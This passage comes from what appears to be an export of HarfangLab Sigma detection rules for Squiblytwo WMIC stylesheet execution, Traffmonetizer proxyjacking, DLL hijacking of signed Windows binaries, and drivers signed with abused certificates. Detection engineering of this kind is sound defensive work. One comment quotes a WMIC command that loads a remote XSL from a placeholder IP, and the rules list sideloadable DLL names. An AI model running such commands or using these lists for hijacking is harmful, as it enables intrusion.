"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a6ba792-4593-442a-9a80-d38ce5e97360",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595992Z",
"creation_date": "2026-03-23T11:45:34.595996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596004Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic",
"https://attack.mitre.org/techniques/T1220/",
"https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates"
],
"name": "t1218_squiblytwo.yml",
"content": "title: Possible Squiblytwo Attack Detected\nid: 1a6ba792-4593-442a-9a80-d38ce5e97360\ndescription: |\n Detects WMIC being invoked with a custom /FORMAT stylesheet instead of one of its built-in output formats.\n WMIC accepts an XSL stylesheet (a local file or a remote URL) to format its output, and such a stylesheet can embed JScript that WMIC executes, giving code execution through a signed Microsoft binary. This technique is also known as Squiblytwo.\n Built-in formats (list, table, csv, rawxml, mof, ...) and stylesheets under the wbem directory are excluded. Note that these exclusions use substring matching, so a custom stylesheet whose name begins with a built-in format name would be excluded as well.\n It is recommended to retrieve the referenced stylesheet and to check for suspicious activity by the current process or any of its children.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic\n - https://attack.mitre.org/techniques/T1220/\n - https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\ndate: 2021/02/08\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1220\n - attack.t1218\n - attack.t1059.007\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.XSL\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # wmic os get /FORMAT:\"http://xxx.xxx.xxx.xxx/keswD.xsl\" (Koadic)\n selection_1:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n selection_2:\n - CommandLine|contains:\n - '/format '\n - '/format:'\n - '/format :'\n - '/ format:'\n - '/ format :'\n - \"/'format':\"\n - \"/'format' :\"\n - \"/ 'format':\"\n - \"/ 'format' :\"\n - '/\"format\":'\n - '/\"format\" :'\n - '/ \"format\":'\n - '/ \"format\" :'\n\n exclusion_fp:\n CommandLine|contains:\n # Builtins formats\n - '/format:list'\n - '/ format:list'\n - '/format: list'\n - '/format:table'\n - '/ format:table'\n - '/format: table'\n - '/format:CSV'\n - '/ format:CSV'\n - '/format: CSV'\n - '/format:rawxml'\n - '/ format:rawxml'\n - '/format: rawxml'\n - '/format:mof'\n - '/ format:mof'\n - '/format: mof'\n - '/format:htable'\n - '/ format:htable'\n - '/format: htable'\n - '/format:hform'\n - '/ format:hform'\n - '/format: hform'\n - '/format:texttable'\n - '/ format:texttable'\n - '/format: texttable'\n - '/format:textvaluelist'\n - '/ format:textvaluelist'\n - '/format: textvaluelist'\n - '/format:htable-sortby'\n - '/ format:htable-sortby'\n - '/format: htable-sortby'\n - '/format:value'\n - '/ format:value'\n - '/format: value'\n - \"/format:'lib/csv.xsl'\"\n - '/format:?:\\Windows\\System32\\wbem\\' # /format:C:\\Windows\\System32\\wbem\\en-us\\csv\n\n exclusion_meshagent:\n # C:\\Program Files\\Mesh Agent\\MeshAgent.exe\n # ?:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\n # D:\\MeshAgent.exe\n ParentImage|endswith: '\\MeshAgent.exe'\n CommandLine:\n - 'wmic diskdrive LIST BRIEF /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv' # (fr-FR, en-US)\n - 'wmic PATH Win32_VideoController GET Name,CurrentHorizontalResolution,CurrentVerticalResolution /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic CPU LIST BRIEF /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic PARTITION LIST /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic OS GET /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic MEMORYCHIP LIST /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n - 'wmic ComputerSystem get PCSystemType /FORMAT:?:\\Windows\\system32\\wbem\\\\??-??\\csv'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a6ba792-4593-442a-9a80-d38ce5e97360",
"rule_name": "Possible Squiblytwo Attack Detected",
"rule_description": "Detects WMIC being invoked with a custom /FORMAT stylesheet instead of one of its built-in output formats.\nWMIC accepts an XSL stylesheet (a local file or a remote URL) to format its output, and such a stylesheet can embed JScript that WMIC executes, giving code execution through a signed Microsoft binary. This technique is also known as Squiblytwo.\nBuilt-in formats (list, table, csv, rawxml, mof, ...) and stylesheets under the wbem directory are excluded. Note that these exclusions use substring matching, so a custom stylesheet whose name begins with a built-in format name would be excluded as well.\nIt is recommended to retrieve the referenced stylesheet and to check for suspicious activity by the current process or any of its children.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1059.007",
"attack.t1218",
"attack.t1220"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a7b3a94-a404-42ce-ba50-a9808950b58a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597287Z",
"creation_date": "2026-03-23T11:45:34.597290Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597298Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_traffmonetizer.yml",
"content": "title: Traffmonetizer Executed\nid: 1a7b3a94-a404-42ce-ba50-a9808950b58a\ndescription: |\n Detects the execution of the Traffmonetizer client, a proxyware tool that lets users monetize their unused Internet bandwidth by sharing it with third-party companies or services via a peer-to-peer (P2P) network.\n Attackers deploy it on compromised hosts to perform proxyjacking: the victim's Internet connection is resold as a proxy exit, consuming bandwidth and potentially associating the host's IP address with abusive traffic.\n The detection keys only on the ' start accept --token' argument pattern, not on the binary name, so confirm that the executing program is actually the Traffmonetizer client and then verify whether its usage is authorized.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: ' start accept --token'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a7b3a94-a404-42ce-ba50-a9808950b58a",
"rule_name": "Traffmonetizer Executed",
"rule_description": "Detects the execution of the Traffmonetizer client, a proxyware tool that lets users monetize their unused Internet bandwidth by sharing it with third-party companies or services via a peer-to-peer (P2P) network.\nAttackers deploy it on compromised hosts to perform proxyjacking: the victim's Internet connection is resold as a proxy exit, consuming bandwidth and potentially associating the host's IP address with abusive traffic.\nThe detection keys only on the ' start accept --token' argument pattern, not on the binary name, so confirm that the executing program is actually the Traffmonetizer client and then verify whether its usage is authorized.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-02-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a8169a6-7d34-4131-9f89-3783ecb9ae0c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601095Z",
"creation_date": "2026-03-23T11:45:34.601098Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ieunatt.yml",
"content": "title: DLL Hijacking via ieunatt.exe\nid: 1a8169a6-7d34-4131-9f89-3783ecb9ae0c\ndescription: |\n Detects potential Windows DLL Hijacking via ieunatt.exe.\n DLL hijacking takes advantage of the default Windows DLL search order, in which the directory of the executable is searched before the system directories, so a DLL planted next to the application is loaded instead of the legitimate one.\n Attackers use this technique by copying the legitimate, Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library (location, signature and content) and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ieunatt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a8169a6-7d34-4131-9f89-3783ecb9ae0c",
"rule_name": "DLL Hijacking via ieunatt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ieunatt.exe.\nDLL hijacking takes advantage of the default Windows DLL search order, in which the directory of the executable is searched before the system directories, so a DLL planted next to the application is loaded instead of the legitimate one.\nAttackers use this technique by copying the legitimate, Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library (location, signature and content) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a8b04c9-09a5-479f-8bf1-4cf580c1eec9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097553Z",
"creation_date": "2026-03-23T11:45:34.097555Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097559Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_w32tm.yml",
"content": "title: DLL Hijacking via w32tm.exe\nid: 1a8b04c9-09a5-479f-8bf1-4cf580c1eec9\ndescription: |\n Detects potential Windows DLL Hijacking via w32tm.exe.\n DLL hijacking takes advantage of the default Windows DLL search order, in which the directory of the executable is searched before the system directories, so a DLL planted next to the application is loaded instead of the legitimate one.\n Attackers use this technique by copying the legitimate, Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library (location, signature and content) and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w32tm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\NTDSAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a8b04c9-09a5-479f-8bf1-4cf580c1eec9",
"rule_name": "DLL Hijacking via w32tm.exe",
"rule_description": "Detects potential Windows DLL Hijacking via w32tm.exe.\nDLL hijacking takes advantage of the default Windows DLL search order, in which the directory of the executable is searched before the system directories, so a DLL planted next to the application is loaded instead of the legitimate one.\nAttackers use this technique by copying the legitimate, Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library (location, signature and content) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1ab2fc0d-1160-461b-99f6-f7936f152d34",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094714Z",
"creation_date": "2026-03-23T11:45:34.094716Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094720Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_notepad.yml",
"content": "title: DLL Hijacking via notepad.exe\nid: 1ab2fc0d-1160-461b-99f6-f7936f152d34\ndescription: |\n Detects potential Windows DLL Hijacking via notepad.exe.\n DLL hijacking takes advantage of the default Windows DLL search order, in which the directory of the executable is searched before the system directories, so a DLL planted next to the application is loaded instead of the legitimate one.\n Attackers use this technique by copying the legitimate, signed executable to a directory they control and planting the malicious DLL alongside it.\n It is recommended to investigate the loaded library (location, signature and content) and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'notepad.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\cabview.dll'\n - '\\comdlg32.dll'\n - '\\cscobj.dll'\n - '\\cscui.dll'\n - '\\dataexchange.dll'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\explorerframe.dll'\n - '\\mmdevapi.dll'\n - '\\networkexplorer.dll'\n - '\\ntlanman.dll'\n - '\\ntshrui.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\windowscodecs.dll'\n - '\\wpdshext.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1ab2fc0d-1160-461b-99f6-f7936f152d34",
"rule_name": "DLL Hijacking via notepad.exe",
"rule_description": "Detects potential Windows DLL Hijacking via notepad.exe.\nDLL hijacking takes advantage of the default Windows DLL search order, in which the directory of the executable is searched before the system directories, so a DLL planted next to the application is loaded instead of the legitimate one.\nAttackers use this technique by copying the legitimate, signed executable to a directory they control and planting the malicious DLL alongside it.\nIt is recommended to investigate the loaded library (location, signature and content) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1b15c2a0-d1d2-4628-a592-e6c9c314baff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625804Z",
"creation_date": "2026-03-23T11:45:34.625806Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625810Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://twitter.com/th3_protoCOL/status/1587823143854698497",
"https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass",
"https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
"https://twitter.com/pr0xylife/status/1595096438798696448",
"https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware",
"https://twitter.com/ESETresearch/status/1594937059348992001",
"https://twitter.com/jaydinbas/status/1646475092006785027",
"https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_driver_malicious_certificate.yml",
"content": "title: Driver Loaded Signed with Malicious Certificate\nid: 1b15c2a0-d1d2-4628-a592-e6c9c314baff\ndescription: |\n Detects the loading of a driver whose signer certificate thumbprint matches a certificate known to have been abused by malicious actors (stolen, leaked, expired-but-reused, or fraudulently obtained, including attestation-signed cases).\n Such a signature is valid rather than forged, which is precisely why attackers use these certificates: a properly signed driver passes driver signature enforcement and can then be used to tamper with EDR/AV solutions from kernel mode.\n Because the match is on the signer thumbprint, legitimate software signed with the same certificate (for example before it was compromised or revoked) can also trigger this rule.\n It is recommended to analyze the loaded driver for malicious content, check the certificate's revocation status, and block the driver if it is confirmed malicious.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://twitter.com/th3_protoCOL/status/1587823143854698497\n - https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - https://twitter.com/pr0xylife/status/1595096438798696448\n - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - https://twitter.com/ESETresearch/status/1594937059348992001\n - https://twitter.com/jaydinbas/status/1646475092006785027\n - https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/21\nmodified: 2025/12/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n DriverSignatureSignerThumbprint:\n # https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - '7C496F5FE65803A45AD7BD8DA5F59B8548E08E0A'\n # https://twitter.com/th3_protoCOL/status/1587823143854698497\n - 'FDD415C4B8A6983CFA982ECABB6D9A55BFD9F623'\n # https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - 'F55B2365D9E837777B760305C78E674B686E5834'\n # https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - 'C7939F8303CA22EFFB28246E970B13BEE6CB8043'\n - '9E7CE1AED4A1C8A985D76BFCD65AC71BFF75430D'\n # https://twitter.com/pr0xylife/status/1595096438798696448\n - 'AAD723780CD440026A6CA0AA1E9D13D09F877E8F'\n # https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - '848C69A831D3789FA2BF6D7A7C8591F80A8F7FCB'\n - 'A8F9B64E4C5CC2AFE5E82DC3C9F44A1BDA2ED4B1'\n - '520CD357E195B57E0BFE7AF87227F4C0737E6BDE'\n - 'DBEB38C344441CB35FF982D1301A1C3DF992E140'\n - '60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3'\n - 'AF5A136DCCED63DEFC29502FEDE9BFF7E2C16A8C'\n - '3A1CE9C2EE30EE8D8883DFC5BF45FF0201C2AB5D'\n # https://twitter.com/ESETresearch/status/1594937059348992001\n - '6EF192CBD6E540F1D740D1BD96317ACAE8C6AF9D'\n # https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - '68FF94B5C77481CC3AB10A05F3C926711C9C5F93'\n # https://twitter.com/SquiblydooBlog/status/1660782805687865344\n - '84F120783C24B1300ADD782414901503AF2F964A'\n # https://twitter.com/jaydinbas/status/1646475092006785027\n - '6ADE753659F5624D5A5D747523F07E23CAD9E65C'\n # https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - '9EEEF1B33142106A095364DD0B2BFC8A24A2A563'\n # https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details\n - '0DD4552A9AABC00F61E619F4812DAFADCAA48715'\n # https://blog.talosintelligence.com/old-certificate-new-signature/\n - '6BC9649368643760190234FBB8395F4CACC2C9CB' # WoSign Class 3 Code Signing CA - 绍兴易游网络科技有限公司\n - '8B91C4BA4546F16D407CEB58090E1C8D82CAF2AC' # thawte SHA256 Code Signing CA - 北京汇聚四海商贸有限公司\n - 'FE6885F629D920DCE90FB03F0DB7B95709811C0D' # thawte SHA256 Code Signing CA - 善君 韦\n - 'F981DB345F885899FAE9382D7D3BCAF75B1CE797' # VeriSign Class 3 Code Signing 2010 CA - Beijing Chunbai 